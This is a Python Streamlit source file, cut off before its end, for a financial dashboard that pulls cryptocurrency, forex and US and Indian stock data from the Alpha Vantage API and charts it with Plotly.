6d765b4b23067a11be3a95449fa522da5607b5cb | 72,401 | py | Python | crypto.py | amangit007/Financial-Analysis-Dashboard | a8bfb838ccc19d73b18c2bed31b327b5c21049e4 | [
"MIT"
] | null | null | null | crypto.py | amangit007/Financial-Analysis-Dashboard | a8bfb838ccc19d73b18c2bed31b327b5c21049e4 | [
"MIT"
] | null | null | null | crypto.py | amangit007/Financial-Analysis-Dashboard | a8bfb838ccc19d73b18c2bed31b327b5c21049e4 | [
"MIT"
] | null | null | null | import datetime
import streamlit as st
import pandas as pd
import plotly.express as px
import numpy as np
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import requests as rs
import json
import random
import webbrowser
import yfinance as yf
from sys_var import api_list,indicator_symbol_list,graph_type_list
class MyError(Exception) :
# Constructor or Initializer
def __init__(self, value) :
self.value = value
# __str__ is to print() the value
def __str__(self) :
return (repr(self.value))
st.set_page_config(layout='wide')
st.sidebar.title('Financial Analysis Dashboard')
radio_select = st.sidebar.radio('Select from below options', [ 'Indian Stocks','Crypto', 'US Stocks', 'Forex',
"Global stocks and more(Alpha Vantage)",
"Global stocks and more(Yahoo Finance)"])
if radio_select == 'Crypto' :
st.title("CRYPTOCURRENCIES")
col1, col2 = st.columns(2)
with col1 :
digital_data = pd.read_csv("digital_currency_list.csv")
dictio = digital_data.set_index('currency name').T.to_dict('list')
digital_list = digital_data['currency name'].dropna().unique().tolist()
crypto_select1 = st.selectbox("Select a Cryptocurrency", digital_list)
input_value = dictio[crypto_select1][0]
with col2 :
currency_data = pd.read_csv("physical_currency_list.csv")
dictio2 = currency_data.set_index('currency name').T.to_dict('list')
currency_list = currency_data['currency name'].dropna().unique().tolist()
currency_select = st.selectbox("Select Currency Pair", currency_list)
currency_select = dictio2[currency_select][0]
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Minute", "5 Minutes", "15 Minutes", "30 Minutes", "60 Minutes", "1 Day", "1 Week",
"1 Month"]
interval_list1 = ["1 Minute", "5 Minutes", "15 Minutes", "30 Minutes", "60 Minutes"]
interval_list2 = ["1 Day", "1 Week", "1 Month"]
interval_list1_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min"}
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min", "30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly", "1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
if interval_select in interval_list1 :
flag = 1
try :
y_arr = ['Rate']
data = None
if flag == 1 :
data = rs.get("https://www.alphavantage.co/query?function=CRYPTO_INTRADAY&symbol=" + str(
input_value) + "&market=" + str(currency_select) + "&interval=" + interval_list1_dict[
interval_select] + "&apikey=" + random.choice(api_list))
print("jello")
data = data.json()
data = json.dumps(data["Time Series Crypto (" + str(interval_list1_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select + "</sub></h1>",
unsafe_allow_html=True)
if graph_type == 'Line' :
# fig = px.line(data, x="index", y=y_arr, template="ggplot2", labels={"index" : "Date"})
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks':
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC':
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=DIGITAL_CURRENCY_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&market=" + str(currency_select) + "&apikey=" + random.choice(api_list))
data = data.json()
data = json.dumps(data["Time Series (Digital Currency " + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4a. close (' + str(currency_select) + ')' : 'Rate'}, inplace=True)
data.rename(columns={'1a. open (' + str(currency_select) + ')' : 'Open'}, inplace=True)
data.rename(columns={'2a. high (' + str(currency_select) + ')' : 'High'}, inplace=True)
data.rename(columns={'3a. low (' + str(currency_select) + ')' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5, step=1)
for i in range(len(interval_sel)) :
data2 = rs.get("https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + str(currency_select) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&apikey=" + random.choice(api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select + "</sub></h1>",
unsafe_allow_html=True)
# fig = px.line(data, x="index", y=y_arr, template="ggplot2", labels={"index" : "Date"})
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
"The selected cryptocurrency data is currently unavailable please check your connection or choose any other cryptocurrency(like Bitcoin)")
if radio_select == 'Forex' :
st.title("FOREX")
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
col1, col2 = st.columns(2)
with col1 :
digital_data = pd.read_csv("physical_currency_list1.csv")
dictio = digital_data.set_index('currency name').T.to_dict('list')
digital_list = digital_data['currency name'].dropna().unique().tolist()
crypto_select1 = st.selectbox("Select the Currency", digital_list)
input_value = dictio[crypto_select1][0]
with col2 :
currency_data = pd.read_csv("physical_currency_list.csv")
dictio2 = currency_data.set_index('currency name').T.to_dict('list')
currency_list = currency_data['currency name'].dropna().unique().tolist()
currency_select = st.selectbox("Select currency pair", currency_list)
currency_select = dictio2[currency_select][0]
with st.expander('Show Options') :
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min", "30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly", "1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
print("https://www.alphavantage.co/query?function=FX_" + interval_list2_dict[
interval_select] + "&from_symbol=" + str(
input_value) + "&to_symbol=" + str(currency_select) + "&apikey=" + random.choice(api_list))
data = rs.get("https://www.alphavantage.co/query?function=FX_" + interval_list2_dict[
interval_select] + "&from_symbol=" + str(
input_value) + "&to_symbol=" + str(
currency_select) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
data = data.json()
print(data)
data = json.dumps(data["Time Series FX (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5, step=1)
for i in range(len(interval_sel)) :
data2 = rs.get("https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + str(currency_select) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select + "</sub></h1>",
unsafe_allow_html=True)
# fig = px.line(data, x="index", y=y_arr, template="ggplot2", labels={"index" : "Date"})
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
# include a go.Bar trace for volumes
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
"The selected forex pair data is currently unavailable please check your connection or choose any other pair")
if radio_select == "Global stocks and more(Alpha Vantage)" :
st.title(radio_select)
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
keyword = st.text_input("Search by symbol,name or keyword")
if keyword != '' :
print(keyword)
print('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = rs.get('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = data.json()
# data = pd.read_json(data)
try :
if data["bestMatches"] == [] :
raise (MyError('No financial entity with this name found in our system'))
data = json.dumps(data["bestMatches"])
data = pd.read_json(data)
data.rename(columns={'1. symbol' : 'Symbol'}, inplace=True)
data.rename(columns={'2. name' : 'Name'}, inplace=True)
data.rename(columns={'3. type' : 'Type'}, inplace=True)
data.rename(columns={'4. region' : 'Region'}, inplace=True)
data.rename(columns={'5. marketOpen' : 'Market Open'}, inplace=True)
data.rename(columns={'6. marketClose' : 'Market Close'}, inplace=True)
data.rename(columns={'7. timezone' : 'Timezone'}, inplace=True)
data.rename(columns={'8. currency' : 'Currency'}, inplace=True)
data_ticker = data['Symbol'].tolist()
data_name = data['Name'].tolist()
data_type = data['Type'].tolist()
data_region = data['Region'].tolist()
new_list = []
for i in range(len(data_ticker)) :
s = data_name[i] + "----" + data_ticker[i] + "----" + data_type[i] + "----" + data_region[i]
new_list.append(s)
new_list.insert(0, '--Select from options--')
col1, col2 = st.columns(2)
with col1 :
new_box = st.selectbox("Select from below options", new_list)
if (new_box != '--Select from options--') :
input_value = new_box.split("----")[1]
crypto_select1 = new_box.split("----")[0]
currency_select = data[data['Symbol'] == input_value]['Currency'].tolist()
currency_select1 = currency_select[0]
print(currency_select)
currency_data = pd.read_csv("physical_currency_list.csv")
currency_select = currency_data[currency_data['currency code'] == currency_select[0]]['currency name']
print(currency_select)
with col2 :
st.selectbox("Select Currency pair", currency_select, disabled=True)
st.table(data[data['Symbol'] == input_value].drop(['9. matchScore'], axis=1))
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly",
"1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=TIME_SERIES_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
# data=rs.get('https://www.alphavantage.co/query?function=DAILY&symbol=RELIANCE.BSE&outputsize=full&apikey=demo')
data = data.json()
data = json.dumps(data["Time Series (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5,
step=1)
for i in range(len(interval_sel)) :
data2 = rs.get(
"https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select1 + "</sub></h1>",
unsafe_allow_html=True)
# fig = px.line(data, x="index", y=y_arr, template="ggplot2", labels={"index" : "Date"})
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
"The selected financial entity data is currently unavailable please check your connection or choose another name")
except MyError as err :
st.info(err.value)
if radio_select == "US Stocks" :
st.title(radio_select)
keyword = st.text_input("Search by symbol,name or keyword")
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
if keyword != '' :
print(keyword)
print('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = rs.get('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = data.json()
# data = pd.read_json(data)
try :
if data["bestMatches"] == [] :
raise (MyError('No financial entity with this name found in our system'))
data = json.dumps(data["bestMatches"])
data = pd.read_json(data)
data.rename(columns={'1. symbol' : 'Symbol'}, inplace=True)
data.rename(columns={'2. name' : 'Name'}, inplace=True)
data.rename(columns={'3. type' : 'Type'}, inplace=True)
data.rename(columns={'4. region' : 'Region'}, inplace=True)
data.rename(columns={'5. marketOpen' : 'Market Open'}, inplace=True)
data.rename(columns={'6. marketClose' : 'Market Close'}, inplace=True)
data.rename(columns={'7. timezone' : 'Timezone'}, inplace=True)
data.rename(columns={'8. currency' : 'Currency'}, inplace=True)
data = data[data['Region'] == 'United States']
if data.count(axis=0)['Symbol'] == 0 :
raise (MyError('No US Stocks with this name found in our system'))
data_ticker = data['Symbol'].tolist()
data_name = data['Name'].tolist()
data_type = data['Type'].tolist()
data_region = data['Region'].tolist()
new_list = []
for i in range(len(data_ticker)) :
s = data_name[i] + "----" + data_ticker[i] + "----" + data_type[i]
new_list.append(s)
new_list.insert(0, '--Select from options--')
col1, col2 = st.columns(2)
with col1 :
new_box = st.selectbox("Select from below options", new_list)
if (new_box != '--Select from options--') :
input_value = new_box.split("----")[1]
crypto_select1 = new_box.split("----")[0]
currency_select = data[data['Symbol'] == input_value]['Currency'].tolist()
currency_select1 = currency_select[0]
currency_data = pd.read_csv("physical_currency_list.csv")
currency_select = currency_data[currency_data['currency code'] == currency_select[0]]['currency name']
with col2 :
st.selectbox("Select Currency pair", currency_select, disabled=True)
st.table(data[data['Symbol'] == input_value].drop(['9. matchScore'], axis=1))
over_data = rs.get('https://www.alphavantage.co/query?function=OVERVIEW&symbol=' + str(
input_value) + '&apikey=' + random.choice(api_list))
if over_data.json() != {} :
milind = st.button('Get more info')
if milind :
a = over_data.json()
c = pd.DataFrame(a, index=[0])
d = c.T.reset_index()
d.index = np.arange(1, len(d) + 1)
d.rename(columns={'index' : 'Info Term'}, inplace=True)
d.rename(columns={0 : 'Info Description'}, inplace=True)
st.table(d)
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly",
"1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=TIME_SERIES_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
# data=rs.get('https://www.alphavantage.co/query?function=DAILY&symbol=RELIANCE.BSE&outputsize=full&apikey=demo')
data = data.json()
data = json.dumps(data["Time Series (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5,
step=1)
for i in range(len(interval_sel)) :
data2 = rs.get(
"https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select1 + "</sub></h1>",
unsafe_allow_html=True)
# fig = px.line(data, x="index", y=y_arr, template="ggplot2", labels={"index" : "Date"})
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
"The selected financial entity data is currently unavailable please check your connection or choose another name")
except MyError as err :
st.info(err.value)
if radio_select == 'Indian Stocks' :
st.title(radio_select)
keyword = st.text_input("Search by symbol,name or keyword")
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
if keyword != '' :
print(keyword)
print('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = rs.get('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = data.json()
# data = pd.read_json(data)
try :
if data["bestMatches"] == [] :
raise (MyError('No financial entity with this name found in our system'))
data = json.dumps(data["bestMatches"])
data = pd.read_json(data)
data.rename(columns={'1. symbol' : 'Symbol'}, inplace=True)
data.rename(columns={'2. name' : 'Name'}, inplace=True)
data.rename(columns={'3. type' : 'Type'}, inplace=True)
data.rename(columns={'4. region' : 'Region'}, inplace=True)
data.rename(columns={'5. marketOpen' : 'Market Open'}, inplace=True)
data.rename(columns={'6. marketClose' : 'Market Close'}, inplace=True)
data.rename(columns={'7. timezone' : 'Timezone'}, inplace=True)
data.rename(columns={'8. currency' : 'Currency'}, inplace=True)
data = data[data['Region'] == 'India/Bombay']
if data.count(axis=0)['Symbol'] == 0 :
raise (MyError('No Indian Stocks with this name found in our system'))
data_ticker = data['Symbol'].tolist()
data_name = data['Name'].tolist()
data_type = data['Type'].tolist()
data_region = data['Region'].tolist()
new_list = []
for i in range(len(data_ticker)) :
s = data_name[i] + "----" + data_ticker[i].split('.')[0] + "----" + data_type[i]
new_list.append(s)
new_list.insert(0, '--Select from options--')
col1, col2 = st.columns(2)
with col1 :
new_box = st.selectbox("Select from below options", new_list)
if (new_box != '--Select from options--') :
temp_select = new_box.split("----")[1]
input_value = new_box.split("----")[1] + '.BSE'
crypto_select1 = new_box.split("----")[0]
currency_select = data[data['Symbol'] == input_value]['Currency'].tolist()
currency_select1 = currency_select[0]
currency_data = pd.read_csv("physical_currency_list.csv")
currency_select = currency_data[currency_data['currency code'] == currency_select[0]]['currency name']
with col2 :
st.selectbox("Select Currency pair", currency_select, disabled=True)
data = data[data['Symbol'] == input_value].drop(['9. matchScore'], axis=1)
